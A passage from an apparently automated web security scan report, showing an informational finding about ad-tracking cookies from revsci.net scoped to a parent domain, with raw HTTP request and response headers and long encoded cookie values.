aYM5Fdq2X5wdPg9T6Do+OZcRV7yXenEb6UwSDf3RSAm0IY+SD8ipE9LwBZvhfmJdFeEr0R405UAb4866ScRZRKQXvpb30RXkj6tqRSb01fmAPW4zIxeirqQiOXvD31vw5+mO+tvvXbK6z7h9WtctO9lQvhzCNEOmY5pQJIw33vytolFLDAbLUBYj/rhTME43fKZmQdGKEbA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:06 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.75. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J07717/b3/0/3/1003161/451564742.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4k+huHIQJvAtY6gquhqs9vksg7ZjGgbPT28I6QQ4O3XYuv3lSTtqNncA2iFgL+J8wQfFRGQkQ2U54M8TCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadNzLTPMV2MpQRwwmT/QbrfyjFZmgC89KD+nUpvWSdQ0wLW6bYmJZ7cmDDJEbgHGkLxfgiXJ68tEV73gfcwOU6lk0j8m4wERf4UpHaqSxIrHw3GVEmGaBl/7kAyGM1sPFVj2vGfhXDoDoLz3wTlA7PsyDlPerjLLFCRBHNjzixQIoOMVs6a8C6bS4Cg++CzRol5QBabiMZ8IY15O/+l0G0QUQJ6AnsDsZlcVhxyiGUl2J3ysiVilfqOCo2vwsU8C4i/nixMJHpiJB5gCkGjQB6TBofo3xP646PFvsX8kOpyqgsbT3BiIEL6nrQrMIgeqbTfYkLHEZWl72/x+3BYjdULstkAApVgtTwD0m3SiY2Ib4pf3quhFEC20316c1d+ZzYPyyr2BuSz00aW+J69QcgLICR9NS4BJvaPZRs/OzE8MKALlcm0B3Mbc57N2Ws6jWqp7eE9Qo7M4FeanFmoG7z2hLMGUHFTkDWZR5yLMMKaqxxIvHT192MSXeBaiBx80slyc8gSqxX7rKbOJzYHGFV4i+URd16G7HzRXDdyvB20JlAOrMf7n0siam4TC00Mw/YvpjjbLWHyZ0dnQsonZtjgQ5iHhzvjHR0YICte13QDmwSAYDg0o2Z4B7LfU4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
rtc_yv6E=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a874&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:03:16 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J07717/b3/0/3/1003161/451564742.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ft.com%252Findepth%252Fprivateequity%253FFTSectionCode%253D29dep%2526FTPageCode%253D29invbnk%2526FTP%253Dnull%2526FTR%253Dnull%2526FTI%253Dnull%2526FTC%253DUSA%2526FTCS%253Dnull%2526SubsLevel%253Danon%2526dfp_site%253Dftcom.5887.ftfm%2526dfp_zone%253Dprivate-equity%2526_rsiL%253D0%26DM_EOM%3D1&C=J07717 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4z+huXIMJ/C1v6FY5BBd22rMpqLhiql/k32IlwMqsneLA7NlzsN5SuHyX2BRF5d65SaNq4yWbBkXQPF7ywJCkw+8fee+Ci1ww4TAIgmBv1Im4IlAyckkFDdZMtEpXiKykk7RoRoFR3oIbR9oO36G6jQquAAjRV25uQHpxKsSbL+Xbpak7/UAb4VY2+Doq58gE6rVzqShFUnu/GeSoBK3FzAQJ4tm6F6+kEV9xIBYDOlLycg+EHCW9SoOK0Da5RrJESR/YCuGWG0X4jEmEemu2r3fG81Kl+H2tkU/7Fupph24Qe2xvtnIX92P2kupq9TJAmvsFIdb6VChs3aYXPBBsKv9JceLT0rXL3r3JqW97t2CNejZJFPqnREALlJkZPimruVQj4CdDasyqHe4qRakKVsk/mA1tXedBz2im5lPQYJh8Iw2kAir007vHlWYJltd9+zB+IogciCvrgYiaiylWplquvfN/YhlZAVyekhcf0/4m3lfxetxVytKCNGRB1eKSptqXsDkBKyzcaJYzYt7E7aUD3ZKN1AAkIco2Hm5fl2ZfyqiP577826hhEMg3Od9PIFhqTbxzd/469rFly/bsvXdR/PZITutLSC2TfN4hB7XY8M6NPQgWWBNbZf/Yl/JQEuTHXfPyCZ0Bp176rqcZUbj0ScrxUyg88l6UeTGPFLBj6e4KLW0doQpigZdTkkduROK9j474Wdxfua0yYnzs8X0b04W7javQJ7WOaeFm6FL; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rtc_d44E=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; rsiPus_Q2bN="MLsXrrEOpxpv55DW8tahZ2a57v6B9McZgL6ClJPbnj9y6INXr6aQartmpyd/bFqAsdrNXC48RurySpTmBggCZ0fiJghVv1hoPrkGxNizCe1+Sw/ItTeB6U8FQUM2WNZ5Th2NQ2naNZMh815xlAKh/kTKBhWTrZU524nJxoyG9N7b/q+lV5TxkZgpDtqssZ6PeStimY8lt+mkZyt8lXEF2PfCDIp8ERjMX0CPj1IkRHeNBQiu5Mtx8x6mTJMdSTTEGcAGi52JS2tQXZ7KoLkSTznY3Kl+JctXZ2Vana9smlQ7z+HT2wpsa88ydKttD3ldpN0qsnYCW2J+05Gg6JxDYiCDtXF7vqhKzj3CelgFI9XltqMTIoxXN38cGU9chbQnB33cwX95TNM0Q8DQN0OJvABPYsz4ayXQsn5x0LYqY92izyCyIzpmIbVcbyXva7pEwOK572spvapBFIaodC0vPfD0k4gWaBf2NWAB53xdBc8/fgIdy0yDUtU3obYQXS6zQyK9ZXFz6CWIg6GFZaL2MWjY9Q524NuixXq9UHFqtDDxJHXfdXwEVl02FpMnPO7n93ltlp1vdV6JCyyuQA4laAHvO2wKOotpylF5c4KFjOEii9De+Ph2HCpgcDzL9W0pPldmTQZM7Pf5piNj/MzpZ0z33CQWH3zypKrhDnQxal067eBty0FQFcwupJDVMaOl5khcvcwr84+jaQDRs7rLpKuMBXl2/4QVFAsgzHUnmo9x2fdpXde7ZVkZw3BV0G5qugRbEstj3mBEDlCZsVZ9sU/cPqOBCWXhYicMY7sf2DOjSevUJi8BIUHdS2NLxrwluYWZkM91uwbfclNzfEERFdSEr64OiKDSQ3NbDJZ/GdCPHTLiM4nKm1A3no/unpJOmLsjQvjO/PoVd9cjslVRI1yAjjNmmQrIzbI35Edu8c6ffKry06WmOJdTlaI6m5vPgdqM6x1TP91HRWbiAYcCBpxuhEi3ER17htDri1tYF8U0Dl2DLzpF++ePWmadjuSHc/MzzPyr5YCFMITflmmwq4WNSx6Ka/6ZuNeh2N6t6U5WKMfy1TyOdeYKaA1/BuwUFMjP16L2tWcjT4YP8dnH7sbihqjBqhepIdcnUWCAIovWLpRikS/K3+gqoS05wgoZGWhc95kbH8wQ/JpOPUAuqejB6ufwUHZRxaFQ9Fxz7L/ZI0w7PPALmXuq/3hBfdp/4QOOXz08W/6T++PEa0kF5+rExYyK/sMGbhNn4yLu7Pd6TpYWAJkorOQskgeg7JeCu9FThdxhOTS2UzCPDbI5bTF/mdKWBDY8WFNHq5jmu2kqkmwg/QmqR8OoXsf0kW8QS/4uwKKSZPy6x0o="; rsi_us_1000000="pUMVIy9DPxYU1H0txu5OnFF190JvDQorYgle/NkbI7ZrufRlRp4d8CYZI1yt89CvWoDvDn6s5s1QWVrKAhiTxFrlIEsxIs6Hc6IgTdTDtVZ7V0S2rxayHplci0mFt5nSM6yVMqdiNwEjSZyFiUL3MRUg31TVd10vq5JINguJp1tYp1efjJ0q6dFou4Y3SrThixizYCOY9Jt0XgJd+m2D2MvikqVZSikwcE/ekDUeUFTmReDToFkkIEuntT5CH+0IQSJFdSYEUpnuJzze4eqcq5TjfENSMgPqD42eubjr8ResIfU/W9ptzNb6NSe3w5/pNwgUbEAW4fqc8ZvsAZW2gUIz49YIsrQe5dbGyoXvt9vGXfjV2g7b2n916csJ7e79QSOpBVm05MQZWyOekDShXL4/lhing+aPUPDCm9VnVDgKtows1Omzj2LFKt//4m0qY1SQ5s0iiqXp02iLJaxjTeDBvfuAAbzz6VhpcprxfW0XhZpB1lEL0sNUV+wXihW1yi7EDn0TD/Yf7jrmQfeVOw7PVI0z9ipUhtIOj1fz9/36Zks8BUKDkfj2Msuyoa5nbxCyBJ6sBGcgcT+aP1/9+oSjf/lz8k/q1sHrHIdejAt5hESJLrZ2Il8YmuoZ/pZfRUw2tDzsR7U2Og73ja1Wqd+Z5V9li4hjH5YSlVTfoJBcLKjLh2YcrdYULCnp9UF0EuVyWQDtHW7ko9oqEveYZm75EKMM7AGcH2RgpuVNSklCr+3799WobyNXv+FFUPdfygsACn2VsOCUvqM8Ghb0M7MHImIUEE4loJ7usSHYe2KJGhtpvB8k3sn0oVYiPIxrHuByMr61S5d9HsfDKU6gCmOjii59ZjK4xX3wO5/UVbbQlO0pTn46lyXVP2HCVnX+0NVEj8uX41XKLBDTpILO5zlE3e49qXKKMyXQCMLY0z23rptNCA/KFry3AdfRj8ERXKcn/ON7RskC5JQOzwjkm1JCwml9qZ0FTUw2Qvk8qfFvCFrLHpZH6Zs0jF2viRMHm94QI3p2jLzh7Uu8oVUtZme+Wx+Gt/9rsQ7faAeZ1SVw/qc1p94sEm7HuiNrSm7sE2iGXDUA8Uwrm+0GLckPdgrmnEE8fgOrbaGnQYiFNRfYMDzjDg+5O6EiAUu1ikv3riJjt2PkHoMKKgjvV4eQwcLCCBgJ0L40eR7jVddVUkM5bTTUbEtmRbzXDdmcoM5HVAJtmovy0IEn+WpeqeQeJMHIO7nAfRCDEJEV13OIAEIKqDoZOx/2qZZw+BnqhgRq/UhycUlyED3lM5yTWChpnnI3PtVTWRdtJmPCiz3oG+OLv6P8A7YlPNtkf4LoW3Al692qdm/miUk1QXWOyoh+zp4+/vOo48wK89TKNqYQuxfhumYGKSFQcMKKeKMBp0yV4Cg9u9iHOrieaQ57zNUs0lwRHva0gRmFFvIPHweYHo/U6kDbl36crm+Y4+VkPN0MiEenmnnXo2b4f9ojPtYEVXqqvIS7YUcPYgYgHCzohdrG9f410sWc8CxoKO//BFM1W+XYPHtrzjuY8ulNz1pZb13AOAmTIeI2txQrcrPBhKty48YUPaPpuYpguw+BohOwzqv6/8EhDej5AMnquU8f0DTa/0/EoRvodITI6Br/ahKlHb3Ov1TH7FWyXQ8cZH7dmWGXNTetcpKmnDUT019yWZaNW4ERlwrZ8I1kNi9SJKyrOgjUoZiaTh8HnFbsYjNXxKzrl4Zh6Na+XP23ITbdsn3Dd9JeTW8Xoo6hWBLhHaM="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_d44E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huHIQJvAtY6gquhqs9vksg7ZjGgbPT28I6QQ4O3XYuv3lSTtqNncA2iFgL+J8wQfFRGQkQ2U54M8TCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadNzLTPMV2MpQRwwmT/QbrfyjFZmgC89KD+nUpvWSdQ0wLW6bYmJZ7cmDDJEbgHGkLxfgiXJ68tEV73gfcwOU6lk0j8m4wERf4UpHaqSxIrHw3GVEmGaBl/7kAyGM1sPFVj2vGfhXDoDoLz3wTlA7PsyDlPerjLLFCRBHNjzixQIoOMVs6a8C6bS4Cg++CzRol5QBabiMZ8IY15O/+l0G0QUQJ6AnsDsZlcVhxyiGUl2J3ysiVilfqOCo2vwsU8C4i/nixMJHpiJB5gCkGjQB6TBofo3xP646PFvsX8kOpyqgsbT3BiIEL6nrQrMIgeqbTfYkLHEZWl72/x+3BYjdULstkAApVgtTwD0m3SiY2Ib4pf3quhFEC20316c1d+ZzYPyyr2BuSz00aW+J69QcgLICR9NS4BJvaPZRs/OzE8MKALlcm0B3Mbc57N2Ws6jWqp7eE9Qo7M4FeanFmoG7z2hLMGUHFTkDWZR5yLMMKaqxxIvHT192MSXeBaiBx80slyc8gSqxX7rKbOJzYHGFV4i+URd16G7HzRXDdyvB20JlAOrMf7n0siam4TC00Mw/YvpjjbLWHyZ0dnQsonZtjgQ5iHhzvjHR0YICte13QDmwSAYDg0o2Z4B7LfU4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
Set-Cookie: rtc_yv6E=MLvv+TMxJohmprbr/FOrg2mNvsIotYBFSXnXGp85AnkmVGe7pmFq+vDasKu3UCzJrIUFRJjHM3y24XIoxzWYaHpPK/ANRh0tzzRwZjFkB2TqggeS4W92jOOrAKTjVv7a9EbCfaDI/8+32MZIvKm8ZIgUvOYW47gPLRHGmUXq0pqmz0yG/4aszFb2p2Jhtglky0gn0Vcq2KOg4iWIc9DK5ItjIdjLIug+LsA9elvc/D8BYJClYOAVjs3imp6qNSc7Wan20jUBNKfKiEyZHjkXJAyDARylN0liiVTbNphhnJafqgzUj2uDOWSxgzaS7YBbLOeT2a10R1KDEK2tI1ULUFLZ6vksyczwgMc4P9mQWrU2IYAot4JiARUindoKhLT8FDwzyFf3b8P3QKAKVr9n1MYNvaIhDqDS7FjXkUCmWo0VV76+KOwwqoe9t2rUvF/3e1Bl424TwfmlaYZfWDjz9O2acj9pVn/R9EwywmAafu10Eqm+w8GRbZdDOcVHhor12OrgNPlNHvtWiQc9n1Nr9qLH3n/J+Cl55VgYvG+eXZyFDSyQG4li2kHUzC9Hn1nAmVVzJRlan3c1t21dO7V6iaw/ZX59p90/k26RlUady6utaV14L0Rm8x7pp8nxx/r4VPIasCa4DsbIuBJyphJNLIbOF/8pvWU/Oy8cLZ0bUCg0ME/KOpbsjpChdO8CmBUHo5cAhy1sMJIytoA6ARyzrx3SVcOaHWqFv5i5mTuc+FxBTAvhXnLogmTHGxoW2gSVe